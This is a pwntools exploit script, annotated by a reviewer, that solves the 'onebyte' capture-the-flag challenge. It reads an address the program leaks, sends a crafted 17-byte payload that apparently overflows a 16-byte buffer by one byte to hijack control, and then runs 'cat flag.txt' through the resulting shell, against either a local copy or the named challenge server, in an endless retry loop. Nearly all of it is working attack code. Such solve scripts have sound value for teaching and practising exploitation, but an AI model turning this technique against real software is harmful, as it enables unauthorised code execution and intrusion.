"""pwntools solve script for the `onebyte` CTF binary.

Each attempt reads the hex address the program prints after
"Free junk: ", waits for the "Your turn: " prompt, and sends a 17-byte
payload: four p32-packed copies of (leak + 70) followed by the single
byte 0x80. It then sends `cat flag.txt` and prints whatever comes back.

NOTE(review): the 17-byte length and the binary's name suggest the bug
is a one-byte write past a 16-byte buffer -- confirm against the
challenge source. The program printing one of its own addresses is what
lets the payload be computed at all.
"""
from pwn import *
import os

# NOTE(review): pwntools appears to read PWNLIB_* variables while `pwn`
# is being imported, so setting this after the import may not switch on
# debug logging in this process -- confirm, and move it above the import
# if debug output is wanted.
os.environ["PWNLIB_DEBUG"] = "1"

# GDB commands handed to gdb.debug() when the script is run with GDB:
# follow the child on fork, break at main+93, then continue.
gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
br *main+93
c
'''

# The binary is expected in the current working directory.
elf = ELF(os.getcwd()+"/onebyte")


def start():
    """Return a tube to the target selected on the command line.

    GDB    -> local binary started under gdb with the `gs` commands
    REMOTE -> the challenge server
    else   -> plain local process
    """
    if args.GDB:
        tube = gdb.debug(elf.path, gs)
    elif args.REMOTE:
        tube = remote("2023.ductf.dev", 30018)
    else:
        tube = process(elf.path)
    return tube


# Retries forever with a fresh target each time; the author's `break`
# is disabled below, so the loop does not stop after a successful run.
# NOTE(review): presumably the attempt only works for some values of the
# leaked address, hence the retry loop -- confirm.
while True:
    io = start()

    # The program prints an address as "0x...\n"; [2:-1] drops the "0x"
    # prefix and the trailing newline before parsing it as hex.
    io.recvuntil("Free junk: ")
    leak_line = io.recvline()
    leak = int(leak_line[2:-1], 16)
    print(hex(leak))

    print(io.recvuntil("Your turn: "))

    # Earlier payload, left disabled by the author:
    # io.send(p32(leak+70) + cyclic(8) + p32(leak+70))

    # 16 bytes of the same packed value, then exactly one extra byte.
    target = p32(leak + 70)
    io.send(target * 4 + b"\x80")

    io.sendline(b"cat flag.txt")
    # Collect output until EOF or the 2-second timeout.
    print(io.recvall(timeout=2))

    # Disabled by the author: stop after one attempt / interactive check.
    # break
    # try:
    #     io.send(b"id")
    #     print(io.recvline())
    #     io.interactive()
    # except:
    #     io.close()
    #     continue